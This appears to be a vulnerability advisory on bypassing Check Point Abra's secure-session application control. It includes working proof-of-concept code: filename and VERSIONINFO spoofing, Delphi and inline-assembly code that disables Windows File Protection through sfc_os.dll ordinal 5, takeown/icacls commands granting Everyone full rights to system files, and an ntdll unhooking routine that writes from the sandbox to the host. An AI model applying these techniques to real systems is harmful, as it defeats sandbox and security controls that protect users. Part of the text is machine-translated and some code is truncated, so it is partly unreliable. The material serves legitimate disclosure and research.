Check Point Abra安全限制绕过和信息泄露漏洞

<Execute OriginalName="calc.exe" PathName="\calc.exe" AppName="Microsoft Calculator" UIDescription="Microsoft Calculator" id="134"/> Application Control session examines the application run only on paths, file names, as well as record VersionInfo in the file. This implies you can import an arbitrary application and run it to bypass the control policy of applications. This is implemented by changing the file name and the field in the resource OriginalFilename VERSIONINFO on any of the white list. Moreover, the user may replace any executable file (eg archiver WinRar) to the host OS without any imports into the secure session and the file will automatically be filled in a secure session (run by the correspondences of extensions, or from the "start" menu). It is also possible to substitute the system default software from the session "Start" menu (Internet Explorer, Notepad, Calculator, File Protection is off to the host OS, you need administrator rights). The substitution of system files can be implemented after disabling File Protection Windows File Protection with a call to the fifth ordinal of exported file system sfc_os.dll functions (windows xp), sample code: hInst := LoadLibrary('sfc_os.dll'); proc := GetProcAddress(hInst, ordinal 5); filename := 'c:\windows\system32\calc.exe'; asm push -1 push filename push 0 call proc end Either by modifying the rights to the file (Vista and above): takeown /f <имя_файла> icacls <имя_файла> /grant %username%:F icacls <имя_файла> /grant *S-1-1-0:(F) It is also well executed Bat-files downloaded from the host computer?s folder called "Downloaded from PC", or any other. The structure of the boot process and secure session: During the secure session creates a separate process group. Executable files and libraries are the product of two assemblies 32 and 64-bit. But despite this, the 64-bit systems still run a few 32-bit modules in the X folder: \ Go \ PWC \ WoW64. The second copy process launches the ISWMGR.exe Explorer explorer.exe processes, which is the parent of all, offered in a secure session of external tools and imported programs. When starting the imported files in a secure session they run a separate application-boot X: \ PWC \ WOW64 \ ISWLDR.dat. He, in turn, loads the library ISWUL.dll, causing the function to set InitHook interceptions. Installed hooks calling functions for working with files, the registry, the clipboard, cryptography, etc: HANDLE (__stdcall *__cdecl GetAddrOf_SetClipboardData())(UINT, HANDLE) { HANDLE (__stdcall *result)(UINT, HANDLE); // eax@1 result = SetClipboardData; addr_SetClipboardData = SetClipboardData; return result; } int __cdecl hooks_Clipboard() { int v0; // eax@1 int v1; // eax@3 int v2; // eax@5 int v3; // eax@7 int result; // eax@9 v0 = splice_func(addr_SetClipboardData, callback_SetClipboardData); if ( v0 ) addr_SetClipboardData = v0; v1 = splice_func(addr_GetClipboardData, callback_GetClipboardData); if ( v1 ) addr_GetClipboardData = v1; v2 = splice_func(addr_OpenClipboard, callback_OpenClipboard); if ( v2 ) addr_OpenClipboard = v2; v3 = splice_func(addr_EmptyClipboard, callback_EmptyClipboard); if ( v3 ) addr_EmptyClipboard = v3; result = splice_func(addr_CloseClipboard, callback_CloseClipboard); if ( result ) addr_CloseClipboard = result; return result; } It is possible to bypass interceptor functions by their release (recovery of the original code functions as it was before the modification) - direct reading from a file system folder (for the use of technology before the reading system files must be copied to a temporary folder and install a structured exception handler), such as ntdll.dll, read the first 10-15 bytes of the function from the file and overwrite the buffer was read the prologue of the corresponding function in the memory (which is the function of the jump-hook, for example ZwLoadDriver). Technique, for example, can allow making changes to files \ Registry of the secure session directly to the host system. procedure resolve_APIs_from_dll_images(mapped_dll_base: pointer; dllname: string); var var_4, var_8, var_10, var_20, var_24, var_2C, var_28, var_3C, var_1C, dllbase, Src, old: DWORD; begin asm pushad mov eax, [mapped_dll_base] mov ecx, [eax+3Ch] mov edx, [mapped_dll_base] lea eax, [edx+ecx+18h] mov [var_10], eax mov ecx, [var_10] mov edx, [mapped_dll_base] add edx, [ecx+60h] mov [var_4], edx mov eax, [var_4] mov ecx, [mapped_dll_base] add ecx, [eax+1Ch] mov [var_8], ecx mov ecx, [var_4] mov edx, [mapped_dll_base] add edx, [ecx+20h] mov [var_20], edx mov eax, [var_4] mov ecx, [mapped_dll_base] add ecx, [eax+24h] mov [var_2C], ec push dllname call LoadLibrary mov [var_28], eax cmp [var_28], 0 jne @loc_41D111 jmp @ending @loc_41D111: mov [var_24], 0 jmp @loc_41D135 @loc_41D11A: mov eax, [var_24] add eax, 1 mov [var_24], eax mov ecx, [var_20] add ecx, 4 mov [var_20], ecx mov edx, [var_2C] add edx, 2 mov [var_2C], edx @loc_41D135: mov eax, [var_4] mov ecx, [var_24] cmp ecx, [eax+18h] jnb @ending mov ecx, [var_24] mov edx, [var_20] mov eax, [mapped_dll_base] add eax, [edx] mov ecx, [var_24] mov edx, [var_8] mov eax, [var_28] add eax, [edx+ecx*4] mov [var_3C], eax mov ecx, [var_24] mov edx, [var_8] mov eax, [mapped_dll_base] add eax, [edx+ecx*4] mov [Src], eax push 0Ah mov ecx, [Src] push ecx lea edx, [Dst] push edx call memcpy add esp, 0Ch lea eax, [old] push eax push PAGE_EXECUTE_READWRITE push 0Ah mov eax, [var_3C] push eax call VirtualProtect push 0Ah lea ecx, [Dst] push ecx mov eax, [var_3C] push eax call memcpy add esp, 0Ch jmp @loc_41D11A @ending: popad end; end; function UnHook(dllname: string): boolean; var MapOffset: pointer; dll, filename: string; MapHandle, FileHandle: THandle; Begin dll := SystemDir + '\' + dllname; filename := GetSpecialPath(CSIDL_APPDATA) + '\' + dllname; result := CopyFile(PChar(dll), PChar(filename), false); if result then begin FileHandle := CreateFile(pChar(filename), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0); If FileHandle <> INVALID_HANDLE_VALUE then Try MapHandle := CreateFileMapping(FileHandle, nil, $1000002, 0, 0, nil); If MapHandle <> 0 then Try MapOffset := MapViewOfFile(MapHandle, FILE_MAP_READ, 0, 0, 0); If MapOffset <> nil then Try resolve_APIs_from_dll_images(MapOffset, dllname); Finally UnmapViewOfFile(MapOffset); End; Finally CloseHandle(MapHandle); End; Finally CloseHandle(FileHandle); End; DeleteFile(filename); end; End; procedure Write2File(filename, s: string); var f: textfile; begin assignfile(f, filename); rewrite(f); writeln(f, s); closefile(f); end; begin UnHook('ntdll.dll'); .. Write2File('c:\users\Administrator\Desktop\POC.txt', 'Now we writing to host OS'); end;